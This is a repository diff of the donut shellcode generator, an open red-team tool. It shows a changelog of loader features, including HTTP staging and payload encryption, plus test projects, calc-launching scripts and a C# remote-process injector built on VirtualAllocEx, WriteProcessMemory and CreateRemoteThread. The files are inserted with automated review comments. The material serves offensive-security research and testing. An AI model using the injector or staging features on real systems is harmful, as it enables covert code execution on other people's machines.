Codebase list donut-shellcode / f38ff4a
Import upstream version 0.9.3 Kali Janitor 3 years ago
173 changed file(s) with 19046 addition(s) and 13198 deletion(s). Raw diff Collapse all Expand all
0 ## Ignore Visual Studio temporary files, build results, and
1 ## files generated by popular Visual Studio add-ons.
2
3 # User-specific files
4 *.suo
5 *.user
6 *.sln.docstates
7
8 # Build results
9 [Dd]ebug/
10 [Dd]ebugPublic/
11 [Rr]elease/
12 [Rr]eleases/
13 x64/
14 x86/
15 bld/
16 [Bb]in/
17 [Oo]bj/
18 build/
19
20 # Roslyn cache directories
21 *.ide/
22 .vs/
23
24 # MSTest test Results
25 [Tt]est[Rr]esult*/
26 [Bb]uild[Ll]og.*
27
28 # NUnit
29 *.VisualState.xml
30 TestResult.xml
31 nunit-*.xml
32
33 # Build Results of an ATL Project
34 [Dd]ebugPS/
35 [Rr]eleasePS/
36 dlldata.c
37
38 *_i.c
39 *_p.c
40 *_i.h
41 *.ilk
42 *.meta
43 *.obj
44 *.pch
45 *.pdb
46 *.pgc
47 *.pgd
48 *.rsp
49 *.sbr
50 *.tlb
51 *.tli
52 *.tlh
53 *.tmp
54 *.tmp_proj
55 *.log
56 *.vspscc
57 *.vssscc
58 .builds
59 *.pidb
60 *.svclog
61 *.scc
62
63 # Chutzpah Test files
64 _Chutzpah*
65
66 # Visual C++ cache files
67 ipch/
68 *.aps
69 *.ncb
70 *.opensdf
71 *.sdf
72 *.cachefile
73
74 # Visual Studio profiler
75 *.psess
76 *.vsp
77 *.vspx
78
79 # TFS 2012 Local Workspace
80 $tf/
81
82 # Guidance Automation Toolkit
83 *.gpState
84
85 # ReSharper is a .NET coding add-in
86 _ReSharper*/
87 *.[Rr]e[Ss]harper
88 *.DotSettings.user
89
90 # JustCode is a .NET coding addin-in
91 .JustCode
92
93 # TeamCity is a build add-in
94 _TeamCity*
95
96 # DotCover is a Code Coverage Tool
97 *.dotCover
98
99 # NCrunch
100 _NCrunch_*
101 .*crunch*.local.xml
102
103 # MightyMoose
104 *.mm.*
105 AutoTest.Net/
106
107 # Web workbench (sass)
108 .sass-cache/
109
110 # Installshield output folder
111 [Ee]xpress/
112
113 # DocProject is a documentation generator add-in
114 DocProject/buildhelp/
115 DocProject/Help/*.HxT
116 DocProject/Help/*.HxC
117 DocProject/Help/*.hhc
118 DocProject/Help/*.hhk
119 DocProject/Help/*.hhp
120 DocProject/Help/Html2
121 DocProject/Help/html
122
123 # Click-Once directory
124 publish/
125
126 # Publish Web Output
127 *.[Pp]ublish.xml
128 *.azurePubxml
129 # TODO: Comment the next line if you want to checkin your web deploy settings
130 # but database connection strings (with potential passwords) will be unencrypted
131 *.pubxml
132 *.publishproj
133
134 # NuGet Packages
135 *.nupkg
136 # The packages folder can be ignored because of Package Restore
137 **/packages/*
138 # except build/, which is used as an MSBuild target.
139 !**/packages/build/
140 # If using the old MSBuild-Integrated Package Restore, uncomment this:
141 #!**/packages/repositories.config
142 Packages.dgml
143
144 # Windows Azure Build Output
145 csx/
146 *.build.csdef
147
148 # Windows Store app package directory
149 AppPackages/
150
151 # Others
152 sql/
153 *.Cache
154 ClientBin/
155 [Ss]tyle[Cc]op.*
156 ~$*
157 *~
158 *.dbmdl
159 *.dbproj.schemaview
160 *.pfx
161 *.publishsettings
162 node_modules/
163
164 # RIA/Silverlight projects
165 Generated_Code/
166
167 # Backup & report files from converting an old project file
168 # to a newer Visual Studio version. Backup files are not needed,
169 # because we have git ;-)
170 _UpgradeReport_Files/
171 Backup*/
172 UpgradeLog*.XML
173 UpgradeLog*.htm
174
175 # SQL Server files
176 *.mdf
177 *.ldf
178
179 # Business Intelligence projects
180 *.rdl.data
181 *.bim.layout
182 *.bim_*.settings
183
184 # Microsoft Fakes
185 FakesAssemblies/
186
187 # =========================
188 # Operating System Files
189 # =========================
190
191 # OSX
192 # =========================
193
194 .DS_Store
195 .AppleDouble
196 .LSOverride
197
198 # Icon must end with two \r
199 Icon
200
201
202 # Thumbnails
203 ._*
204
205 # Files that might appear on external disk
206 .Spotlight-V100
207 .Trashes
208
209 # Directories potentially created on remote AFP share
210 .AppleDB
211 .AppleDesktop
212 Network Trash Folder
213 Temporary Items
214 .apdisk
215
216 # Windows
217 # =========================
218
219 # Windows image file caches
220 Thumbs.db
221 ehthumbs.db
222
223 # Folder config file
224 Desktop.ini
225
226 # Recycle Bin used on file shares
227 $RECYCLE.BIN/
228
229 # Windows Installer files
230 *.cab
231 *.msi
232 *.msm
233 *.msp
234
235 #OpenCover output
236 coverage.xml
237
238 #Msbuild binary log output
239 output.binlog
240
241 # KDiff3
242 *_BACKUP_*
243 *_BASE_*
244 *_LOCAL_*
245 *_REMOTE_*
246 *.orig
247
248 AkavacheSqliteLinkerOverride.cs
249 NuGetBuild
250 WiX.Toolset.DummyFile.txt
251 GitHubVS.sln.DotSettings
0 [submodule "generators/go-donut"]
1 path = generators/go-donut
2 url = https://github.com/Binject/go-donut
0 # Changelog
1 All notable changes to this project will be documented in this file.
2
3 ## [0.9.3]
4
5 ### Added
6
7 * The -e switch can be used to disable entropy and/or encryption. Options are: 1=none, 2=generate random names, 3=generate random names + use symmetric encryption.
8 * The -z switch tells the builder to compress the input file. 1=none, 2=aPLib. On Windows, a further three algorithms are supported, which are 3=LZNT1, 4=Xpress and 5=Xpress Huffman.
9 * The -f switch specifies the output format for loader. 1=binary, 2=base64, 3=c, 4=ruby, 5=python, 6=powershell, 7=c# and 8=hex. On Windows, Base64 strings are copied to the clipboard.
10 * The -t switch tells the loader to run unmanaged entrypoint for EXE as a thread. This also attempts to intercept exit-related API in Import Address Table by replacing their pointers with the address of RtlExitUserThread.
11 * The -n switch can be used to specify name of module for HTTP staging. If entropy is enabled, this is generated randomly.
12 * The -s switch specifies the HTTP server to download module from.
13 * The -y switch tells loader to create a new thread for the loader and continues executing at a specific address or Original Entry Point (OEP). The address should be provided as a string in hexadecimal format.
14 * The -x switch can be used to specify how loader terminates. 1=exit thread, 2=exit process.
15 * The -p switch is used to specify parameters to .NET method, DLL function or command line for an unmanaged EXE file. Wrap multiple parameters inside quotations.
16 * The -w switch tells the loader to convert parameters to UNICODE before passing to unmanaged DLL function.
17 * C# generator by n1xbyte: https://github.com/n1xbyte/donutCS
18 * Go generator by awgh https://github.com/Binject/go-donut
19
20 ### Changed
21
22 * Command line is no longer parsed using semi-colon or comma as a token. The -p switch now accepts a string with all parameters enclosed in quotation marks. For .NET DLL/EXE, these are separated by the loader using CommandLineToArgvW. For unmanaged DLL, the string is passed to the DLL function without any modification.
23 * The -u switch to specify URL for HTTP stager is replaced with -s switch to prepare for a DNS stager.
24 * The -f switch to specify input file is now used to specify output format of loader.
25
26 ### Removed
27
28 * XSL files are no longer supported.
29 * Code stub for calling DLL function with multiple arguments.
0 using System.Diagnostics;
1
2 public class TestClass
3 {
4 public static void RunProcess(string path, string path2)
5 {
6 Process.Start(path);
7 Process.Start(path2);
8 }
9 }
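Review bot: The two `Process.Start` calls in `RunProcess` discard the returned `Process` objects, so each launch leaks a process handle until the finalizer collects it; `using (Process.Start(path)) { }` and `using (Process.Start(path2)) { }` release the handle as soon as the launch returns. The method also carries no doc comment; a one-line `/// <summary>Starts the two executables named by <paramref name="path"/> and <paramref name="path2"/>; a failed launch propagates the exception thrown by Process.Start.</summary>` would state the contract the accompanying README relies on.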
0 <Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
1 <PropertyGroup>
2 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
3 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
4 <ProjectGuid>{75C4A31E-6E99-4289-8701-EF0B6CD94435}</ProjectGuid>
5 <OutputType>Library</OutputType>
6 <NoStandardLibraries>false</NoStandardLibraries>
7 <AssemblyName>DemoCreateProcess</AssemblyName>
8 <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
9 <FileAlignment>512</FileAlignment>
10 </PropertyGroup>
11 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
12 <DebugSymbols>true</DebugSymbols>
13 <DebugType>full</DebugType>
14 <Optimize>false</Optimize>
15 <OutputPath>bin\Debug\</OutputPath>
16 <DefineConstants>DEBUG;TRACE</DefineConstants>
17 <ErrorReport>prompt</ErrorReport>
18 <WarningLevel>4</WarningLevel>
19 </PropertyGroup>
20 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
21 <DebugType>pdbonly</DebugType>
22 <Optimize>true</Optimize>
23 <OutputPath>bin\Release\</OutputPath>
24 <DefineConstants>TRACE</DefineConstants>
25 <ErrorReport>prompt</ErrorReport>
26 <WarningLevel>4</WarningLevel>
27 </PropertyGroup>
28 <PropertyGroup>
29 <RootNamespace>DemoCreateProcess</RootNamespace>
30 </PropertyGroup>
31 <ItemGroup>
32 <Reference Include="Microsoft.CSharp" />
33 <Reference Include="System" />
34 <Reference Include="System.Core" />
35 <Reference Include="System.Data" />
36 <Reference Include="System.Data.DataSetExtensions" />
37 <Reference Include="System.Xml" />
38 <Reference Include="System.Xml.Linq" />
39 </ItemGroup>
40 <ItemGroup>
41 <Compile Include="Class1.cs" />
42 </ItemGroup>
43 <ItemGroup>
44 <None Include="Readme.md" />
45 </ItemGroup>
46 <Import Project="$(MSBuildToolsPath)\Microsoft.CSHARP.Targets" />
47 <ProjectExtensions>
48 <VisualStudio AllowExistingFolder="true" />
49 </ProjectExtensions>
50 </Project>
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "DemoCreateProcess.csproj", "{75C4A31E-6E99-4289-8701-EF0B6CD94435}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {3A24F1AC-B24D-4029-9661-05CA11DAFC82}
23 EndGlobalSection
24 EndGlobal
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("DemoCreateProcess")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("DemoCreateProcess")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
0 # DemoCreateProcess
1
2 A simple C# program to use as a demo for testing shellcode. It takes two program names (such as notepad.exe,calc.exe) as parameters. You may generate shellcode for it using donut:
3
4 64-bit:
5
6 ```
7 .\donut.exe .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
8 ```
9
10 32-bit:
11
12 ```
13 .\donut.exe -a 1 .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
14 ```
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup>
3 <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/>
4 </startup>
5 </configuration>
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>DonutTest</RootNamespace>
9 <AssemblyName>DonutTest</AssemblyName>
10 <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
13 <Deterministic>true</Deterministic>
14 <TargetFrameworkProfile />
15 </PropertyGroup>
16 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 <PlatformTarget>AnyCPU</PlatformTarget>
18 <DebugSymbols>true</DebugSymbols>
19 <DebugType>full</DebugType>
20 <Optimize>false</Optimize>
21 <OutputPath>bin\Debug\</OutputPath>
22 <DefineConstants>DEBUG;TRACE</DefineConstants>
23 <ErrorReport>prompt</ErrorReport>
24 <WarningLevel>4</WarningLevel>
25 </PropertyGroup>
26 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 <PlatformTarget>AnyCPU</PlatformTarget>
28 <DebugType>pdbonly</DebugType>
29 <Optimize>true</Optimize>
30 <OutputPath>bin\Release\</OutputPath>
31 <DefineConstants>TRACE</DefineConstants>
32 <ErrorReport>prompt</ErrorReport>
33 <WarningLevel>4</WarningLevel>
34 <Prefer32Bit>false</Prefer32Bit>
35 </PropertyGroup>
36 <ItemGroup>
37 <Reference Include="System" />
38 <Reference Include="System.Core" />
39 <Reference Include="System.Xml.Linq" />
40 <Reference Include="System.Data.DataSetExtensions" />
41 <Reference Include="Microsoft.CSharp" />
42 <Reference Include="System.Data" />
43 <Reference Include="System.Net.Http" />
44 <Reference Include="System.Xml" />
45 </ItemGroup>
46 <ItemGroup>
47 <Compile Include="Program.cs" />
48 <Compile Include="Properties\AssemblyInfo.cs" />
49 </ItemGroup>
50 <ItemGroup>
51 <None Include="App.config" />
52 </ItemGroup>
53 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
54 </Project>
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DonutTest", "DonutTest.csproj", "{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}"
6 EndProject
7 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "..\DemoCreateProcess\DemoCreateProcess.csproj", "{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}"
8 EndProject
9 Global
10 GlobalSection(SolutionConfigurationPlatforms) = preSolution
11 Debug|Any CPU = Debug|Any CPU
12 Release|Any CPU = Release|Any CPU
13 EndGlobalSection
14 GlobalSection(ProjectConfigurationPlatforms) = postSolution
15 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
16 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.Build.0 = Debug|Any CPU
17 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.ActiveCfg = Release|Any CPU
18 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.Build.0 = Release|Any CPU
19 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
20 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.Build.0 = Debug|Any CPU
21 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.ActiveCfg = Release|Any CPU
22 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.Build.0 = Release|Any CPU
23 EndGlobalSection
24 GlobalSection(SolutionProperties) = preSolution
25 HideSolutionNode = FALSE
26 EndGlobalSection
27 GlobalSection(ExtensibilityGlobals) = postSolution
28 SolutionGuid = {E91D143E-AB90-41D2-942F-D3F1DC8352F3}
29 EndGlobalSection
30 EndGlobal
0 // A Hello World! program in C#.
1 using System;
2 namespace HelloWorld
3 {
4 class Hello
5 {
6 static void Main()
7 {
8 Console.WriteLine("Hello World!");
9 }
10 }
11 }
0 /* Author: TheWover
1 Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls.
2 Last Modified: 11/1/2018
3 */
4 using System;
5 using System.Diagnostics;
6 using System.Runtime.InteropServices;
7
8 namespace ShellcodeTest
9 {
10 public class Program
11 {
12 static string x64 = @"";
13 static string x86 = @"";
14
15 static int pid = Process.GetCurrentProcess().Id;
16
17 static void Main(string[] args)
18 {
19 if (args.Length >= 1)
20 pid = Convert.ToInt32(args[0]);
21
22 Inject(x86, x64, pid);
23 }
24
25 [DllImport("kernel32.dll")]
26 public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
27
28 [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
29 public static extern IntPtr GetModuleHandle(string lpModuleName);
30
31 [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
32 static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
33
34 [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
35 static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
36 uint dwSize, uint flAllocationType, uint flProtect);
37
38 [DllImport("kernel32.dll", SetLastError = true)]
39 static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
40
41 [DllImport("kernel32.dll")]
42 static extern IntPtr CreateRemoteThread(IntPtr hProcess,
43 IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
44
45 const int PROCESS_CREATE_THREAD = 0x0002;
46 const int PROCESS_QUERY_INFORMATION = 0x0400;
47 const int PROCESS_VM_OPERATION = 0x0008;
48 const int PROCESS_VM_WRITE = 0x0020;
49 const int PROCESS_VM_READ = 0x0010;
50
51
52 const uint MEM_COMMIT = 0x00001000;
53 const uint MEM_RESERVE = 0x00002000;
54 const uint PAGE_READWRITE = 4;
55 const uint PAGE_EXECUTE_READWRITE = 0x40;
56
57 /// <summary>
58 /// Injects shellcode into the target process using CreateRemoteThread, using the correct version for the process's architecture.
59 /// </summary>
60 /// <param name="x86">Base64-encoded x86 shellcode.</param>
61 /// <param name="x64">Base64-encoded x64 shellcode</param>
62 /// <param name="procPID">The PID of the target process.</param>
63 /// <returns></returns>
64 public static int Inject(string x86, string x64, int procPID)
65 {
66
67 Process targetProcess = Process.GetProcessById(procPID);
68 Console.WriteLine(targetProcess.Id);
69
70 string s;
71
72 if (IsWow64Process(targetProcess) == true)
73 s = x86;
74 else
75 s = x64;
76
77 byte[] shellcode = Convert.FromBase64String(s);
78
79 IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
80
81 IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
82
83 UIntPtr bytesWritten;
84 WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)shellcode.Length, out bytesWritten);
85
86 CreateRemoteThread(procHandle, IntPtr.Zero, 0, allocMemAddress, IntPtr.Zero, 0, IntPtr.Zero);
87
88 return 0;
89 }
90
91 [System.Runtime.InteropServices.DllImport("kernel32.dll")]
92 public static extern bool IsWow64Process(System.IntPtr hProcess, out bool lpSystemInfo);
93
94 /// <summary>
95 /// Checks whether the process is 64-bit.
96 /// </summary>
97 /// <returns>Returns true if process is 64-bit, and false if process is 32-bit.</returns>
98 public static bool IsWow64Process(Process process)
99 {
100 bool retVal = false;
101 IsWow64Process(process.Handle, out retVal);
102 return retVal;
103 }
104 }
105 }
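Review bot: The summary on `IsWow64Process(Process)` (rendered lines 94–98) is inverted: the Win32 `IsWow64Process` sets its out flag to true for a 32-bit process running under WOW64, which is also how `Inject` consumes the result (true selects `x86`), so the tag should read `/// <returns>True if the process is a 32-bit process running under WOW64; false otherwise, including native 64-bit processes.</returns>`. The wrapper also discards the BOOL success value of the P/Invoke, so a failed query leaves `retVal` false and silently selects the x64 payload. In `Inject`, the handles returned by `OpenProcess` and `CreateRemoteThread` are never passed to `CloseHandle`, and none of the four native calls is checked for `IntPtr.Zero`/false, so with the shipped empty `x86`/`x64` strings `shellcode.Length` is 0, the failing `VirtualAllocEx` goes unreported and the method still returns 0; its empty `<returns></returns>` tag should say that the return value is always 0. `Convert.ToInt32(args[0])` in `Main` throws `FormatException` on a non-numeric argument, which the README's `DonutTest.exe [PID]` usage line does not mention.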
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("DonutTest")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("DonutTest")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("3c9a6b88-bed2-4ba8-964c-77ec29bf1846")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
0 # DonutTest
1
2 A simple C# shellcode remote injector to use in testing donut. It contains both x86 and x64 versions of the shellcode, determines the architecture of the target process, and then injects the appropriate version into that process with CreateRemoteThread. The shellcode must be Base64-encoded and dropped into the code as a string. This ensures that it can be run entirely from memory.
3
4 You may Base64-encode your shellcode and copy it to your clipboard with the PowerShell below:
5
6 ```powershell
7 $filename = "C:\\Test\donut\\loader.bin"
8 [Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip
9 ```
10
11 ```
12 Usage:
13
14 DonutTest.exe [PID]
15
16 If no PID is specified, then DonutTest will inject the shellcode into itself.
17 ```
0
1 var sh
2 sh = new ActiveXObject("Wscript.Shell")
3 sh.Run("calc.exe")
4 WScript.Quit()
0
1 Dim sh
2 Set sh = CreateObject("Wscript.Shell")
3 Call sh.Run("calc.exe")
4 Set sh = Nothing
5 WScript.Quit()
6
0 #define WIN32_LEAN_AND_MEAN
1 #define UNICODE
2
3 #include <windows.h>
4 #include "donut.h"
5
6 #pragma comment(lib, "user32.lib")
7
8 __declspec(dllexport)
9 VOID APIENTRY DonutApiVoid(VOID) {
10 MessageBoxA(NULL, "Hello, World!", "Donut Test for VOID API", MB_OK);
11 }
12
13 __declspec(dllexport)
14 VOID APIENTRY DonutApiW(PWCHAR argv) {
15 MessageBoxW(NULL, argv, L"Donut Test for UNICODE strings", MB_OK);
16 }
17
18 __declspec(dllexport)
19 VOID APIENTRY DonutApiA(PCHAR argv) {
20 MessageBoxA(NULL, argv, "Donut Test for ANSI strings", MB_OK);
21 }
22
23 __declspec(dllexport)
24 BOOL APIENTRY DllMain(HMODULE hModule,
25 DWORD ul_reason_for_call,
26 LPVOID lpReserved) {
27 switch (ul_reason_for_call) {
28 case DLL_PROCESS_ATTACH:
29 case DLL_THREAD_ATTACH:
30 case DLL_THREAD_DETACH:
31 case DLL_PROCESS_DETACH:
32 break;
33 }
34 return TRUE;
35 }
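--- a/DonutTest/hello.c
+++ b/DonutTest/hello.c
@@ -1,56 +0,0 @@
-#define UNICODE
-
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/stat.h>
-#include <inttypes.h>
-
-#include <windows.h>
-#pragma comment(lib, "user32.lib")
-#pragma comment(lib, "shell32.lib")
-
-__declspec(dllexport)
-VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
-PROCESS_INFORMATION pi;
-STARTUPINFO si;
-
-ZeroMemory(&si, sizeof(si));
-si.cb = sizeof(si);
-CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
-
-ZeroMemory(&si, sizeof(si));
-si.cb = sizeof(si);
-CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
-}
-
-__declspec(dllexport)
-VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
-WCHAR msg[4096];
-
-_snwprintf(msg, ARRAYSIZE(msg),
-L"param[0] : %ws\r"
-L"param[1] : %ws\r"
-L"param[2] : %ws\r"
-L"param[3] : %ws\r",
-arg0, arg1, arg2, arg3);
-
-MessageBox(NULL, msg, L"Donut Test", MB_OK);
-}
-
-__declspec(dllexport)
-BOOL WINAPI DllMain(HMODULE hModule,
-DWORD ul_reason_for_call,
-LPVOID lpReserved) {
-switch (ul_reason_for_call) {
-case DLL_PROCESS_ATTACH:
-MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
-break;
-case DLL_THREAD_ATTACH:
-case DLL_THREAD_DETACH:
-case DLL_PROCESS_DETACH:
-break;
-}
-return TRUE;
-}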
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <windows.h>
32 #include <oleauto.h>
33 #include <mscoree.h>
34 #include <comdef.h>
35
36 #include <cstdio>
37 #include <cstdint>
38 #include <cstring>
39 #include <cstdlib>
40 #include <sys/stat.h>
41
42 #pragma comment(lib, "mscoree.lib")
43 #import "mscorlib.tlb" raw_interfaces_only
44
45 void rundotnet(void *code, size_t len) {
46 HRESULT hr;
47 ICorRuntimeHost *icrh;
48 IUnknownPtr iu;
49 mscorlib::_AppDomainPtr ad;
50 mscorlib::_AssemblyPtr as;
51 mscorlib::_MethodInfoPtr mi;
52 VARIANT v1, v2;
53 SAFEARRAY *sa;
54 SAFEARRAYBOUND sab;
55
56 printf("CorBindToRuntime(ICorRuntimeHost).\n");
57 hr = CorBindToRuntime(
58 NULL, // load latest runtime version available
59 NULL, // load workstation build
60 CLSID_CorRuntimeHost,
